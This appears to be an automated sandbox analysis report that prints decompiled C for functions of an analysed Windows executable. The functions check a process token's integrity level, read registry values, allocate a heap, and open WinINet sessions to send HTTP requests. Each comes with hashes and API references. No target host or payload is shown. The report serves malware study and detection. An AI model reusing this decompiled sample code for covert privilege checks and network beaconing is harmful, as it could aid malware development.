API ID: InformationToken$ChangeCloseFindNotification
String ID:
API String ID: 671759997-0
Opcode ID: 34d2017fdb8c114ed8dcac2f6aa2aa3b84caff5a7dc3344d574dac1ba0fd69c0
Instruction ID: 22951e224adcb138652592d388a9d0ea10a4ad4bd3b6d0ab9f307493cc9f1bd9
Opcode Fuzzy Hash: 34d2017fdb8c114ed8dcac2f6aa2aa3b84caff5a7dc3344d574dac1ba0fd69c0
Instruction Fuzzy Hash: CD51C1312083019AD710EA76CA45B6B77E4AF84318F04497FF984B62D2EBBCCD45C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00402594, Relevance: 3.2, APIs: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402594(void* __eax, void* __eflags) {
				char _v12;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				signed char* _v40;
				void* _v44;
				long _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* __esi;
				intOrPtr* _t32;
				void* _t36;
				signed char* _t41;
				int _t46;
				intOrPtr* _t51;
				intOrPtr* _t57;
				signed char* _t60;
				signed char* _t64;
				DWORD* _t90;
				signed char* _t91;
				void* _t92;
				void* _t93;
				char _t94;

				_t96 =  &_v36;
				_t92 = __eax;
				_v12 = 0;
				_t32 = E0040E4B4(0xb0, __eax);
				 *_t32(_t92, 8,  &_v12);
				_v32 = _v24;
				_v28 = 1;
				_t36 = E004019A0( &_v32);
				_t98 = _t36;
				if(_t36 != 0) {
					_v36 = 0;
					E0040E4B4(0xae, _t92);
					_t90 =  &_v36;
					GetTokenInformation(_v32, 0x19, 0, 0, _t90); // executed
					_t41 = _v40;
					__eflags = _t41;
					if(_t41 != 0) {
						E00407450( &_v56, _t41);
						_t93 = E00409700( &_v60, 0);
						E0040E4B4(0xae, _t93);
						_t46 = GetTokenInformation(_v44, 0x19, _t93, _v48, _t90); // executed
						__eflags = _t46;
						if(_t46 == 0) {
							E0040AE90( &_v60, _t93);
							__eflags = _v36;
							if(__eflags != 0) {
								E00408190( &_v40, _t93, __eflags);
							}
							__eflags = 0;
							return 0;
						} else {
							_t51 = E0040E4B4(0xad, _t93);
							_t91 =  *_t51( *_t93);
							__eflags = _t91;
							if(_t91 == 0) {
								E0040AE90( &_v64, _t93);
								__eflags = _v40;
								if(__eflags != 0) {
									E00408190( &_v44, _t93, __eflags);
								}
								__eflags = 0;
								return 0;
							} else {
								_t57 = E0040E4B4(0xac, _t93);
								_t60 =  *_t57( *_t93, ( *_t91 & 0x000000ff) - 1);
								__eflags = _t60;
								if(_t60 == 0) {
									E0040AE90( &_v36 + 4, _t93);
									__eflags = _v48;
									if(__eflags != 0) {
										E00408190( &_v52, _t93, __eflags);
									}
									__eflags = 0;
									return 0;
								} else {
									_t64 =  *_t60;
									__eflags = _t64;
									if(_t64 == 0) {
										_t94 = 1;
									} else {
										__eflags = _t64 - 0x1000;
										if(_t64 == 0x1000) {
											_t94 = 2;
										} else {
											__eflags = _t64 - 0x2100;
											if(_t64 == 0x2100) {
												_t94 = 4;
											} else {
												__eflags = _t64 - 0x2000;
												if(_t64 == 0x2000) {
													_t94 = 3;
												} else {
													__eflags = _t64 - 0x3000;
													if(_t64 == 0x3000) {
														_t94 = 5;
													} else {
														__eflags = _t64 - 0x4000;
														if(_t64 != 0x4000) {
															__eflags = _t64 - 0x5000;
															_t94 =  ==  ? 7 : 0;
														} else {
															_t94 = 6;
														}
													}
												}
											}
										}
									}
									E0040AE90(_t96 + 4, _t94);
									__eflags = _v48;
									if(__eflags != 0) {
										E00408190( &_v52, _t94, __eflags);
									}
									return _t94;
								}
							}
						}
					} else {
						__eflags = _v32;
						if(__eflags != 0) {
							E00408190( &_v36, _t92, __eflags);
						}
						__eflags = 0;
						return 0;
					}
				} else {
					E00408190( &_v32, _t92, _t98);
					return 0;
				}
			}

0x00402596
0x00402599
0x004025a0
0x004025a8
0x004025b7
0x004025c1
0x004025c5
0x004025ca
0x004025cf
0x004025d1
0x004025e9
0x004025f1
0x004025fa
0x00402607
0x00402609
0x0040260d
0x0040260f
0x0040262e
0x0040263e
0x00402645
0x00402656
0x00402658
0x0040265a
0x00402763
0x00402768
0x0040276d
0x00402773
0x00402773
0x00402778
0x0040277f
0x00402660
0x00402665
0x0040266e
0x00402670
0x00402672
0x00402742
0x00402747
0x0040274c
0x00402752
0x00402752
0x00402757
0x0040275e
0x00402678
0x0040267d
0x0040268b
0x0040268d
0x0040268f
0x00402721
0x00402726
0x0040272b
0x00402731
0x00402731
0x00402736
0x0040273d
0x00402695
0x00402695
0x00402697
0x00402699
0x00402716
0x0040269b
0x0040269b
0x004026a0
0x0040270f
0x004026a2
0x004026a2
0x004026a7
0x00402708
0x004026a9
0x004026a9
0x004026ae
0x00402701
0x004026b0
0x004026b0
0x004026b5
0x004026db
0x004026b7
0x004026b7
0x004026bc
0x004026cc
0x004026d6
0x004026be
0x004026be
0x004026be
0x004026bc
0x004026b5
0x004026ae
0x004026a7
0x004026a0
0x004026e4
0x004026e9
0x004026ee
0x004026f4
0x004026f4
0x00402700
0x00402700
0x0040268f
0x00402672
0x00402611
0x00402611
0x00402616
0x0040261c
0x0040261c
0x00402621
0x00402628
0x00402628
0x004025d3
0x004025d7
0x004025e3
0x004025e3

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00402607

Part of subcall function 00408190: FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindInformationNotificationToken
String ID:
API String ID: 584730905-0
Opcode ID: 53067ee044eb30cc9ff3bb2ca93df4ff11c0bb7ca127216c86efb6b0fee6d338
Instruction ID: d26a74dbf4f2edbbd94c76840a93b4a4774ba27ce600a5b05c874b9f3b8c6451
Opcode Fuzzy Hash: 53067ee044eb30cc9ff3bb2ca93df4ff11c0bb7ca127216c86efb6b0fee6d338
Instruction Fuzzy Hash: FC41A1316082015AE725EA2AD94979F76D09F84354F04083FF485B62E2EABDCDCAC7D7

Uniqueness

Uniqueness Score: -1.00%

Function 00402400, Relevance: 3.1, APIs: 2, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402400(void* __ecx, void* __eflags, char* _a4, intOrPtr _a8) {
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				void* __esi;
				void* _t37;
				char* _t39;

				_t37 = __ecx;
				if(E0040EAC0(__ecx) == 0) {
					_v24 = 0;
					_v20 = 0;
					E0040E4B4(0xba, 0);
					_t39 = _a4;
					RegQueryValueExA( *(_t37 + 4), _t39, 0,  &_v24, 0,  &_v20); // executed
					_t19 = _v20;
					if(_v20 != 0) {
						E00409F60(_a8, _t19);
						E0040E4B4(0xba, 0);
						RegQueryValueExA( *(_t37 + 4), _t39, 0,  &_v32, E00409700(_a4, 0),  &_v28); // executed
						return _v32;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00402407
0x00402410
0x00402425
0x00402429
0x0040242d
0x00402434
0x00402448
0x0040244a
0x00402450
0x00402463
0x0040246d
0x00402490
0x0040249d
0x00402452
0x0040245b
0x0040245b
0x00402412
0x0040241b
0x0040241b

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00416C54,?,00404AD2,?,?,?,00000000), ref: 00402448

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 291010aad21f5ac955520d6fdc022d4e105324ce443974fd4deb0117218c9240
Instruction ID: 9628f10cd02a6c1163a9310fcfb111c5ddf1efa4072111960f2d567f3ed6c4ff
Opcode Fuzzy Hash: 291010aad21f5ac955520d6fdc022d4e105324ce443974fd4deb0117218c9240
Instruction Fuzzy Hash: 2A1186323052157BD200A62ADC40CABBBECEFC5368F00893BF448D3251D636DD56C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC4, Relevance: 3.0, APIs: 2, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401FC4(long __eax, void* __esi) {
				void* _t5;
				void* _t8;
				long _t11;

				_t12 = __esi;
				_push(__esi);
				_t11 = __eax;
				if( *0x416c00 == 0x21436587) {
					E0040E4B4(0x55, __esi);
					_t5 = HeapCreate(0, 0xa00000, 0); // executed
					 *0x416c00 = _t5;
				}
				E0040E4B4(0x57, _t12);
				_t8 = RtlAllocateHeap( *0x416c00, 8, _t11); // executed
				return _t8;
			}

0x00401fc4
0x00401fd5
0x00401fd6
0x00401fe2
0x00402001
0x00402011
0x00402013
0x00402013
0x00401fe9
0x00401ff7
0x00401ffb

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,0040E0C9,?,0040279B,00000000), ref: 00401FF7
HeapCreate.KERNELBASE(00000000,00A00000,00000000,?,?,0040E0C9,?,0040279B,00000000), ref: 00402011

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateCreate
String ID:
API String ID: 2875408731-0
Opcode ID: ee653ab09710ee93a42bb3df0432f851494da9db4100b67c98dbd467ff66a5cc
Instruction ID: 889790a7cb6b1296d7e3fa3bfffeb985743830b49e44318b493bb21dc6a05e30
Opcode Fuzzy Hash: ee653ab09710ee93a42bb3df0432f851494da9db4100b67c98dbd467ff66a5cc
Instruction Fuzzy Hash: 44E08C303085416AE710A77ABC05F6B2199EBC4301F22883BB005E22F1FF788801A6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0, Relevance: 2.0, APIs: 1, Instructions: 493
networkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004097F0(char __ecx, intOrPtr _a4) {
				char _v0;
				intOrPtr _v24;
				char _v28;
				long _v36;
				void* _v40;
				void* _v44;
				long _v64;
				long _v68;
				void* _v72;
				long _v76;
				long _v80;
				unsigned int _v84;
				long _v88;
				intOrPtr _v92;
				char _v104;
				void* _v108;
				long _v112;
				unsigned int _v116;
				intOrPtr _v120;
				signed short* _v124;
				long _v128;
				unsigned int _v132;
				void* _v136;
				long _v140;
				long _v144;
				char _v148;
				intOrPtr _v152;
				long _v156;
				long _v160;
				long _v164;
				long _v168;
				long _v172;
				long _v176;
				char _v180;
				long _v184;
				long _v188;
				long _v192;
				long _v196;
				long _v200;
				long _v204;
				long _v208;
				long _v212;
				long _v216;
				long _v220;
				char _v228;
				void* _v232;
				void* _v236;
				void* _v240;
				void* _v244;
				void* _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t189;
				intOrPtr _t192;
				signed short* _t200;
				unsigned int _t201;
				long _t203;
				int _t205;
				intOrPtr* _t216;
				int _t217;
				intOrPtr* _t227;
				int _t228;
				intOrPtr* _t244;
				void* _t250;
				int _t252;
				long _t253;
				void* _t275;
				char* _t284;
				void* _t309;
				long _t311;
				unsigned int* _t312;
				void* _t313;
				char* _t314;
				long _t315;
				int _t317;
				signed int _t319;
				void* _t320;
				signed int _t322;
				void* _t328;
				intOrPtr _t342;
				long _t361;
				intOrPtr* _t363;
				long _t369;
				intOrPtr* _t373;
				long _t374;
				intOrPtr* _t376;
				long _t377;
				intOrPtr _t378;
				char _t380;
				long _t381;
				long _t383;
				long _t384;
				long _t386;
				unsigned int* _t388;
				unsigned int* _t389;

				_t388 =  &_v132;
				_t380 = __ecx;
				_t189 =  *((intOrPtr*)(__ecx + 4));
				if(_t189 == 0 || _t189 == 0xffffffff) {
					L58:
					E00407450(_a4, 0);
					return _v0;
				} else {
					_t192 =  *((intOrPtr*)(__ecx + 8));
					if(_t192 == 0 || _t192 == 0xffffffff) {
						goto L58;
					} else {
						_t376 = __ecx + 0x1c;
						if( *((intOrPtr*)(_t376 + 4)) == 0) {
							_t384 = 0;
							_v68 = 0;
							_v64 = 0;
							E0040E280( &_v68, __ecx, 0);
						} else {
							_t384 = 0;
							_v28 = 0;
							_v24 = 0;
							E0040EA50( &_v28,  *_v0, 0);
							if( *((intOrPtr*)(_t376 + 4)) > 1) {
								_t322 = 1;
								do {
									E0040B7A0( &_v28, 0x414bf0);
									E0040B7A0( &(_t388[0x1f]),  *((intOrPtr*)( *((intOrPtr*)( *_t376 + _t322 * 4)))));
									_t322 = _t322 + 1;
								} while (_t322 <  *((intOrPtr*)(_t376 + 4)));
							}
							_v68 = _t384;
							_v64 = _t384;
							E0040EA50( &_v68, _v28, _t384);
							E0040BAB4(_v36);
							_v36 = _t384;
							_t388[0x1f] = _t384;
						}
						E0040DEA0(_t309, _t376, _t376);
						E0040A358( &(_t388[0x16]));
						_t361 = E0040E4B4(0x140, _t380);
						if(_t361 != 0) {
							_v136 =  *((intOrPtr*)(_t380 + 8));
							_t200 = _t388[0x16];
							_v124 = _t200;
							_v128 =  *((intOrPtr*)(_t376 + 4));
							if(_t200 == 0) {
								_t311 = _t384;
							} else {
								_t311 = _t384;
								while(( *_t200 & 0x0000ffff) != 0) {
									_t200 =  &(_t200[1]);
									_t311 = _t311 + 1;
								}
							}
							_t327 = _t388[0x27];
							_t201 =  *((intOrPtr*)(_t388[0x27] + 8));
							_v132 = _t201;
							if(_t201 != 0) {
								_v140 = _t361;
								_t328 = E00409700(_t327, 0);
							} else {
								_t328 = _t384;
							}
							_t203 = _v128;
							_t204 =  !=  ? _v124 : _t203;
							_t205 = HttpSendRequestW(_v136,  !=  ? _v124 : _t203, _t311, _t328, _v132); // executed
							if(_t205 == 0) {
								E0040EAB0();
								if(_t205 != 0) {
									goto L56;
								} else {
									goto L18;
								}
							} else {
								L18:
								_t388[0x1b] = 4;
								_t363 = E0040E4B4(0x146, _t380);
								if(_t363 == 0) {
									_t205 = 0x7f;
									goto L56;
								} else {
									_t312 =  &(_t388[0x1b]);
									_t205 =  *_t363( *((intOrPtr*)(_t380 + 8)), 0x20000013,  &_v64, _t312, 0);
									if(_t205 == 0) {
										E0040EAB0();
										if(_t205 != 0) {
											goto L56;
										} else {
											goto L20;
										}
									} else {
										L20:
										_v116 = _t384;
										_v112 = _t384;
										 *((intOrPtr*)(_t380 + 0x30)) = _v84;
										E0040E060( &_v116, _t380, 0x2800);
										_v84 = _v116 >> 1;
										_t216 = E0040E4B4(0x146, _t380);
										if(_t216 == 0) {
											_t217 = 0x7f;
											goto L54;
										} else {
											_t217 =  *_t216( *((intOrPtr*)(_t380 + 8)), 0x14, _v116, _t312, 0);
											if(_t217 == 0) {
												E0040EAB0();
												if(_t217 != 0) {
													L54:
													 *(_t380 + 0x3c) = _t217;
													E0040BAB4(_v116);
													_v116 = _t384;
													_v112 = _t384;
													E0040BAB4(_t388[0x16]);
													goto L57;
												} else {
													goto L22;
												}
											} else {
												L22:
												E00406488( &_v144);
												_t224 = _v144;
												if(_v144 !=  *((intOrPtr*)(_t380 + 0x34))) {
													E0040EA50(_t380 + 0x34, _t224, 0);
													_t224 = _v152;
												}
												E0040BAB4(_t224);
												_v144 = _t384;
												_v140 = _t384;
												_t388[0x1b] = _v132 >> 1;
												_t227 = E0040E4B4(0x146, _t380);
												if(_t227 == 0) {
													_t228 = 0x7f;
													goto L52;
												} else {
													_t228 =  *_t227( *((intOrPtr*)(_t380 + 8)), 0x16, _v136, _t312, 0);
													if(_t228 == 0) {
														E0040EAB0();
														if(_t228 != 0) {
															L52:
															 *(_t380 + 0x3c) = _t228;
															E0040BAB4(_v136);
															_v136 = _t384;
															_v132 = _t384;
															E0040BAB4(_v120);
															goto L57;
														} else {
															goto L26;
														}
													} else {
														L26:
														_t369 = _v156;
														E00406488( &_v164);
														_t235 = _v164;
														if(_v164 != _v148) {
															E0040EA50( &_v148, _t235, 0);
															_t235 = _v172;
														}
														E0040BAB4(_t235);
														_v164 = _t384;
														_v160 = _t384;
														_t313 = E00408DB0(_t380, _v148, 0x414bf0);
														_t389 =  &(_t388[2]);
														if(_t313 == 0) {
															_t314 =  &_v220;
															E0040E710(_t314, _t369,  &_v148);
														} else {
															_v200 = _t384;
															_v196 = _t384;
															_v192 = _t384;
															_v188 = _t384;
															_v184 = _t384;
															E0040E280( &_v188, _t380, _t384);
															_t342 = _v152;
															_t284 = 0x414bf0;
															_t374 = _t384;
															do {
																_t284 = _t284 + 1;
																_t374 = _t374 + 1;
															} while ( *_t284 != 0);
															_v220 = _t376;
															_t378 = _t342;
															_v180 = _t380;
															_t383 = _t384;
															_t386 = _t374;
															do {
																_v132 = _t383;
																_t320 = _t313 - _t378;
																_v128 = _t383;
																if(_t320 == 0) {
																	E0040E280( &_v132, _t383, 0);
																} else {
																	E0040EA50( &_v132, _t378, _t320);
																}
																E0040E200( &_v200, _v132);
																E0040BAB4(_v136);
																_v136 = _t383;
																_t378 = _t378 + _t320 + _t386;
																_v132 = _t383;
																_t313 = E00408DB0(_t383, _t378, 0x414bf0);
																_t389 =  &(_t389[2]);
															} while (_t313 != 0);
															_t384 = _t383;
															_t376 = _v220;
															_t380 = _v180;
															E0040E200( &_v200, _t378);
															_t389[2] = _t384;
															_v220 = _t384;
															_v216 = _t384;
															_v212 = _t384;
															_v208 = _t384;
															E0040E280( &_v212, _t380, _t384);
															_t314 =  &_v228;
															if( &_v208 != _t314) {
																_push( &_v200);
																E00409F80(_t314, _t314);
															}
															E0040DEA0(_t314,  &_v200, _t376);
															E0040BAB4(_v188);
															_v188 = _t384;
															_v184 = _t384;
														}
														if(_t314 != _t376) {
															_push(_t314);
															E00409F80(_t314, _t376);
														}
														E0040DEA0(_t314, _t314, _t376);
														E0040BAB4(_v208);
														_v208 = _t384;
														_v204 = _t384;
														if( *((intOrPtr*)(_t376 + 4)) > 0) {
															_t244 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c))));
														} else {
															_t244 = _t380 + 0x28;
														}
														 *((char*)( *_t244)) = 0;
														if( *((intOrPtr*)(_t376 + 4)) > 1) {
															_v176 = _t380 + 0x28;
															_t319 = 1;
															_v180 = _t380;
															_t381 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c)) + 4));
															while(1) {
																E00409F28( &_v116, 0xf);
																_t275 = E00409EB0(_t381,  *_t381, _v116);
																_t389 =  &(_t389[2]);
																E0040BAB4(_v116);
																_v116 = _t384;
																_v112 = _t384;
																if(_t275 != 0) {
																	break;
																}
																_t319 = _t319 + 1;
																if(_t319 >=  *((intOrPtr*)(_t376 + 4))) {
																	_t380 = _v180;
																} else {
																	if(_t319 < 0) {
																		_t381 = _v176;
																	} else {
																		_t381 =  *((intOrPtr*)( *_t376 + _t319 * 4));
																	}
																	continue;
																}
																goto L60;
															}
															_t373 = _v176;
															_t380 = _v180;
															if(_t319 >= 0 && _t319 <  *((intOrPtr*)(_t376 + 4))) {
																_t373 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c)) + _t319 * 4));
															}
															 *((char*)( *_t373)) = 0;
														}
														L60:
														E00405240(_t376);
														E00407450( &_v180, 0x1000);
														_t315 = _v176;
														_t377 = _t384;
														while(1) {
															_t389[0x20] = 0;
															if(E0040E4B4(0x148, _t380) == 0) {
																break;
															}
															_t250 = E00409700( &_v180, _t377);
															_t252 = _v0( *((intOrPtr*)(_t380 + 8)), _t250, _t315 - _t377,  &_v104);
															if(_t252 == 0) {
																E0040EAB0();
																_t317 = _t252;
																if(_t317 == 0) {
																	goto L68;
																} else {
																	goto L72;
																}
															} else {
																_t317 = 0;
																L68:
																_t253 = _v116;
																if(_t253 == 0) {
																	L72:
																	_t384 = 0;
																} else {
																	_t377 = _t377 + _t253;
																	_t315 = _v188;
																	if(_t377 == _t315) {
																		E00409F60( &_v196, _t315 + 0x1000);
																		_t315 = _v192;
																	}
																	continue;
																}
															}
															L63:
															E00409F60( &_v196, _t377);
															if(_t317 != 0) {
																 *(_t380 + 0x3c) = _t317;
																E0040AE90( &_v196, _t380);
																E0040BAB4(_v172);
																_v172 = _t384;
																_v168 = _t384;
																E0040BAB4(_v156);
																goto L57;
															} else {
																E00409710(_v92,  &_v196);
																E0040AE90( &_v200, _t380);
																E0040BAB4(_v176);
																_v176 = _t384;
																_v172 = _t384;
																E0040BAB4(_v160);
																_v160 = _t384;
																_v156 = _t384;
																E0040BAB4(_v168);
																_v168 = _t384;
																_v164 = _t384;
																return _t389[0x26];
															}
															goto L88;
														}
														_t384 = 0;
														_t317 = 0x7f;
														goto L63;
													}
												}
											}
										}
									}
								}
							}
						} else {
							_t205 = 0x7f;
							L56:
							 *(_t380 + 0x3c) = _t205;
							E0040BAB4(_v80);
							L57:
							_v80 = _t384;
							_v76 = _t384;
							E0040BAB4(_v88);
							_v88 = _t384;
							_v84 = _t384;
							goto L58;
						}
					}
				}
				L88:
			}

0x004097f4
0x004097fa
0x004097fc
0x00409801
0x00409cab
0x00409cb4
0x00409cca
0x00409810
0x00409810
0x00409815
0x00000000
0x00409824
0x00409824
0x0040982b
0x004098a2
0x004098a4
0x004098a8
0x004098b1
0x0040982d
0x00409833
0x00409835
0x00409839
0x00409847
0x00409850
0x00409854
0x00409855
0x0040985e
0x0040986e
0x00409873
0x00409874
0x00409855
0x00409879
0x0040987d
0x0040988a
0x00409893
0x00409898
0x0040989c
0x0040989c
0x004098b8
0x004098c5
0x004098d4
0x004098d8
0x004098e7
0x004098eb
0x004098f4
0x004098f8
0x004098fc
0x00409ea7
0x00409902
0x00409904
0x0040990b
0x0040990d
0x00409910
0x00409914
0x0040990b
0x00409918
0x0040991f
0x00409924
0x00409928
0x00409e93
0x00409ea0
0x0040992e
0x0040992e
0x0040992e
0x00409930
0x00409936
0x00409946
0x0040994a
0x00409e7f
0x00409e86
0x00000000
0x00409e8c
0x00000000
0x00409e8c
0x00409950
0x00409950
0x00409955
0x00409962
0x00409966
0x00409c81
0x00000000
0x0040996c
0x00409970
0x00409980
0x00409984
0x00409e6d
0x00409e74
0x00000000
0x00409e7a
0x00000000
0x00409e7a
0x0040998a
0x0040998a
0x0040998e
0x00409992
0x0040999b
0x004099a2
0x004099b2
0x004099b6
0x004099bd
0x00409c5d
0x00000000
0x004099c3
0x004099cf
0x004099d3
0x00409e5b
0x00409e62
0x00409c62
0x00409c62
0x00409c69
0x00409c72
0x00409c76
0x00409c7a
0x00000000
0x00409e68
0x00000000
0x00409e68
0x004099d9
0x004099d9
0x004099e1
0x004099e6
0x004099ed
0x004099f5
0x004099fa
0x004099fa
0x004099fe
0x00409a0e
0x00409a12
0x00409a16
0x00409a1a
0x00409a21
0x00409c39
0x00000000
0x00409a27
0x00409a33
0x00409a37
0x00409e49
0x00409e50
0x00409c3e
0x00409c3e
0x00409c45
0x00409c4e
0x00409c52
0x00409c56
0x00000000
0x00409e56
0x00000000
0x00409e56
0x00409a3d
0x00409a3d
0x00409a3d
0x00409a45
0x00409a4a
0x00409a52
0x00409a5b
0x00409a60
0x00409a60
0x00409a64
0x00409a69
0x00409a6d
0x00409a7f
0x00409a81
0x00409a86
0x00409e34
0x00409e3f
0x00409a8c
0x00409a8c
0x00409a90
0x00409a94
0x00409a98
0x00409a9c
0x00409aa5
0x00409aaa
0x00409aae
0x00409ab3
0x00409ab5
0x00409ab5
0x00409ab6
0x00409ab7
0x00409abc
0x00409ac0
0x00409ac2
0x00409ac6
0x00409ac8
0x00409aca
0x00409aca
0x00409ace
0x00409ad0
0x00409ad4
0x00409ae9
0x00409ad6
0x00409adc
0x00409adc
0x00409af6
0x00409aff
0x00409b06
0x00409b0a
0x00409b0c
0x00409b1b
0x00409b1d
0x00409b20
0x00409b26
0x00409b28
0x00409b2c
0x00409b35
0x00409b3a
0x00409b3e
0x00409b42
0x00409b46
0x00409b4a
0x00409b53
0x00409b58
0x00409b62
0x00409b6a
0x00409b6b
0x00409b6b
0x00409b74
0x00409b7d
0x00409b82
0x00409b86
0x00409b86
0x00409b8c
0x00409b90
0x00409b91
0x00409b91
0x00409b98
0x00409ba1
0x00409ba6
0x00409baa
0x00409bb2
0x00409bbc
0x00409bb4
0x00409bb4
0x00409bb4
0x00409bc0
0x00409bc7
0x00409bd3
0x00409bd7
0x00409bdc
0x00409be3
0x00409be5
0x00409bee
0x00409bf9
0x00409c00
0x00409c07
0x00409c0e
0x00409c14
0x00409c18
0x00000000
0x00000000
0x00409c1e
0x00409c22
0x00409ccd
0x00409c28
0x00409c2a
0x00409c33
0x00409c2c
0x00409c2e
0x00409c2e
0x00000000
0x00409c2a
0x00000000
0x00409c22
0x00409e13
0x00409e19
0x00409e1d
0x00409e27
0x00409e27
0x00409e2c
0x00409e2c
0x00409cd1
0x00409cd3
0x00409ce1
0x00409ce6
0x00409cea
0x00409cec
0x00409cf1
0x00409d05
0x00000000
0x00000000
0x00409db1
0x00409dc7
0x00409dcb
0x00409e01
0x00409e06
0x00409e0a
0x00000000
0x00000000
0x00000000
0x00000000
0x00409dcd
0x00409dcd
0x00409dcf
0x00409dcf
0x00409dd8
0x00409e0c
0x00409e0c
0x00409dda
0x00409dda
0x00409ddc
0x00409de2
0x00409df3
0x00409df8
0x00409df8
0x00000000
0x00409de2
0x00409dd8
0x00409d12
0x00409d17
0x00409d1e
0x00409d81
0x00409d88
0x00409d91
0x00409d9a
0x00409d9e
0x00409da2
0x00000000
0x00409d20
0x00409d2c
0x00409d35
0x00409d3e
0x00409d47
0x00409d4b
0x00409d4f
0x00409d58
0x00409d5c
0x00409d60
0x00409d65
0x00409d69
0x00409d7e
0x00409d7e
0x00000000
0x00409d1e
0x00409d0b
0x00409d0d
0x00000000
0x00409d0d
0x00409a37
0x00409a21
0x004099d3
0x004099bd
0x00409984
0x00409966
0x004098da
0x004098da
0x00409c86
0x00409c86
0x00409c8d
0x00409c92
0x00409c96
0x00409c9a
0x00409c9e
0x00409ca3
0x00409ca7
0x00000000
0x00409ca7
0x004098d8
0x00409815
0x00000000

APIs

HttpSendRequestW.WININET(?,?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00409946

Part of subcall function 0040BAB4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeapHttpRequestSend
String ID:
API String ID: 457321143-0
Opcode ID: 54bd5b62cb0fa66b0c1f64e23de0f26b2c3dfe4c691bf94ef13f772df4d90e6f
Instruction ID: be19dea9e682f1ccab86711ee6c89ef1ef1736676b1039119e2f9640732d1147
Opcode Fuzzy Hash: 54bd5b62cb0fa66b0c1f64e23de0f26b2c3dfe4c691bf94ef13f772df4d90e6f
Instruction Fuzzy Hash: 40122A706083459BD710EF56C881A1BBBE4BF84744F50483EF595A73A2DB79EC05CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A980, Relevance: 1.6, APIs: 1, Instructions: 63
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A980(char* __ecx) {
				void* _t26;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr* _t37;
				void* _t40;
				char* _t42;
				void* _t43;
				intOrPtr* _t44;
				void* _t45;

				_t42 = __ecx;
				 *__ecx = 0;
				_t35 = __ecx + 0x14;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *(__ecx + 0xc) = 1;
				 *(__ecx + 0x10) = 1;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				E0040E280(_t35, _t43, 0);
				_t44 = __ecx + 0x1c;
				 *_t44 = 0;
				_t36 = __ecx + 0x28;
				 *((intOrPtr*)(_t44 + 4)) = 0;
				 *((intOrPtr*)(_t44 + 8)) = 0;
				 *_t36 = 0;
				 *((intOrPtr*)(_t36 + 4)) = 0;
				E0040E280(_t36, _t43, 0);
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				_t37 = __ecx + 0x34;
				 *_t37 = 0;
				 *((intOrPtr*)(_t37 + 4)) = 0;
				E0040E280(_t37, _t43, 0);
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				_t40 =  *0x416c24; // 0xffffffff
				if(_t40 == 0xffffffff) {
					 *__ecx = 1;
					E0040E4B4(0x137, _t43);
					_t26 = InternetOpenA(0, 1, 0, 0, 0); // executed
					 *0x416c24 = _t26;
				}
				E00409F28(_t45 + 8, 1);
				E0040E200(_t44,  *((intOrPtr*)(_t45 + 8)));
				E0040BAB4( *((intOrPtr*)(_t45 + 8)));
				 *((intOrPtr*)(_t45 + 8)) = 0;
				 *((intOrPtr*)(_t45 + 0xc)) = 0;
				return _t42;
			}

0x0040a986
0x0040a990
0x0040a992
0x0040a995
0x0040a998
0x0040a99b
0x0040a99e
0x0040a9a1
0x0040a9a3
0x0040a9a6
0x0040a9ac
0x0040a9af
0x0040a9b2
0x0040a9b5
0x0040a9b8
0x0040a9bb
0x0040a9bd
0x0040a9c0
0x0040a9c5
0x0040a9c8
0x0040a9cc
0x0040a9ce
0x0040a9d1
0x0040a9d6
0x0040a9dd
0x0040a9e6
0x0040aa20
0x0040aa23
0x0040aa2e
0x0040aa30
0x0040aa30
0x0040a9f1
0x0040a9fc
0x0040aa05
0x0040aa0a
0x0040aa10
0x0040aa1a

APIs

